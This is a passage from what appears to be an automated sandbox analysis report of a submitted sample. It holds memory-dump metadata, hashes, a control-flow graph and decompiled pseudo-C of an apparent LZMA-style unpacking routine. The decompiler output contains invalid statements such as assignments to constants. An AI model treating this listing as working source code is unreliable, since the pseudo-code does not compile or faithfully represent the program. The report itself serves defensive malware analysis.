                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004074c7
                                                          0x00407490

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                          • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                          • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                          • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 711 407395-407399 712 4073bb-4073c8 711->712 713 40739b-40749d 711->713 715 4073cb-4073e0 712->715 723 4074c7-4074cb 713->723 716 4073e2-4073f8 715->716 717 4073fa-407410 715->717 719 407413-40741a 716->719 717->719 721 407441 719->721 722 40741c-407420 719->722 728 407447-40744d 721->728 726 407426-40743e 722->726 727 4075cf-4075d9 722->727 724 40752b-40753e 723->724 725 4074cd-4074ee 723->725 724->728 729 4074f0-407505 725->729 730 407507-40751a 725->730 726->721 731 4075e5-4075f8 727->731 733 406bf2 728->733 734 4075fa 728->734 735 40751d-407524 729->735 730->735 736 4075fd-407601 731->736 737 406bf9-406bfd 733->737 738 406d39-406d5a 733->738 739 406c9e-406ca2 733->739 740 406d0e-406d12 733->740 734->736 741 4074c4 735->741 742 407526 735->742 737->731 743 406c03-406c10 737->743 738->715 747 406ca8-406cc1 739->747 748 40754e-407558 739->748 744 406d18-406d2c 740->744 745 40755d-407567 740->745 741->723 749 4074a9-4074c1 742->749 750 4075db 742->750 743->734 751 406c16-406c5c 743->751 752 406d2f-406d37 744->752 745->731 753 406cc4-406cc8 747->753 748->731 749->741 750->731 754 406c84-406c86 751->754 755 406c5e-406c62 751->755 752->738 752->740 753->739 756 406cca-406cd0 753->756 761 406c94-406c9c 754->761 762 406c88-406c92 754->762 759 406c64-406c67 GlobalFree 755->759 760 406c6d-406c7b GlobalAlloc 755->760 757 406cd2-406cd9 756->757 758 406cfa-406d0c 756->758 763 406ce4-406cf4 GlobalAlloc 757->763 764 406cdb-406cde GlobalFree 757->764 758->752 759->760 760->734 765 406c81 760->765 761->753 762->761 762->762 763->734 763->758 764->763 765->754
                                                          C-Code - Quality: 98%
                                                          			E00407395() {
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int* _t605;
                                                          				void* _t612;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t612 - 0x40) != 0) {
                                                          						 *(_t612 - 0x84) = 0x13;
                                                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                          						goto L132;
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x4c);
                                                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          						__ecx =  *(__ebp - 0x58);
                                                          						__eax =  *(__ebp - 0x4c) << 4;
                                                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          						L130:
                                                          						 *(__ebp - 0x58) = __eax;
                                                          						 *(__ebp - 0x40) = 3;
                                                          						L144:
                                                          						 *(__ebp - 0x7c) = 0x14;
                                                          						L145:
                                                          						__eax =  *(__ebp - 0x40);
                                                          						 *(__ebp - 0x50) = 1;
                                                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          						L149:
                                                          						if( *(__ebp - 0x48) <= 0) {
                                                          							__ecx =  *(__ebp - 0x40);
                                                          							__ebx =  *(__ebp - 0x50);
                                                          							0 = 1;
                                                          							__eax = 1 << __cl;
                                                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          							__eax =  *(__ebp - 0x7c);
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							while(1) {
                                                          								L140:
                                                          								 *(_t612 - 0x88) = _t533;
                                                          								while(1) {
                                                          									L1:
                                                          									_t534 =  *(_t612 - 0x88);
                                                          									if(_t534 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                          										case 0:
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											_t534 =  *( *(_t612 - 0x70));
                                                          											if(_t534 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											_t538 = _t534 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t569);
                                                          											_push(9);
                                                          											_pop(_t570);
                                                          											_t608 = _t538 / _t569;
                                                          											_t540 = _t538 % _t569 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t603 = _t540 % _t570 & 0x000000ff;
                                                          											 *(_t612 - 0x3c) = _t603;
                                                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                          												L10:
                                                          												if(_t611 == 0) {
                                                          													L12:
                                                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t611 = _t611 - 1;
                                                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                          												} while (_t611 != 0);
                                                          												goto L12;
                                                          											}
                                                          											if( *(_t612 - 4) != 0) {
                                                          												GlobalFree( *(_t612 - 4));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t612 - 4) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t612 - 0x6c);
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											_t45 = _t612 - 0x48;
                                                          											 *_t45 =  *(_t612 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
                                                          											if( *(_t612 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											_t546 =  *(_t612 - 0x40);
                                                          											if(_t546 ==  *(_t612 - 0x74)) {
                                                          												L20:
                                                          												 *(_t612 - 0x48) = 5;
                                                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											 *(_t612 - 0x74) = _t546;
                                                          											if( *(_t612 - 8) != 0) {
                                                          												GlobalFree( *(_t612 - 8));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                          											 *(_t612 - 8) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                          											 *(_t612 - 0x84) = 6;
                                                          											 *(_t612 - 0x4c) = _t553;
                                                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                          											goto L132;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t612 - 0x6c);
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											_t67 = _t612 - 0x70;
                                                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                          											if( *(_t612 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t531 =  *_t605;
                                                          											_t588 = _t531 & 0x0000ffff;
                                                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                          											if( *(_t612 - 0xc) >= _t564) {
                                                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                          												 *(_t612 - 0x40) = 1;
                                                          												_t532 = _t531 - (_t531 >> 5);
                                                          												__eflags = _t532;
                                                          												 *_t605 = _t532;
                                                          											} else {
                                                          												 *(_t612 - 0x10) = _t564;
                                                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                          											}
                                                          											if( *(_t612 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											} else {
                                                          												goto L137;
                                                          											}
                                                          										case 5:
                                                          											L137:
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 5;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                          											L139:
                                                          											_t533 =  *(_t612 - 0x84);
                                                          											goto L140;
                                                          										case 6:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											goto L132;
                                                          										case 8:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xa;
                                                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x38);
                                                          												__ecx =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 0x38) + 0xf;
                                                          												 *(__ebp - 0x84) = 9;
                                                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          											}
                                                          											goto L132;
                                                          										case 9:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L90;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t259;
                                                          											0 | _t259 = _t259 + _t259 + 9;
                                                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          											goto L76;
                                                          										case 0xa:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												goto L132;
                                                          											}
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L89;
                                                          										case 0xb:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L89:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L90:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L100:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t335 = __ebp - 0x70;
                                                          											 *_t335 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t335;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L102;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
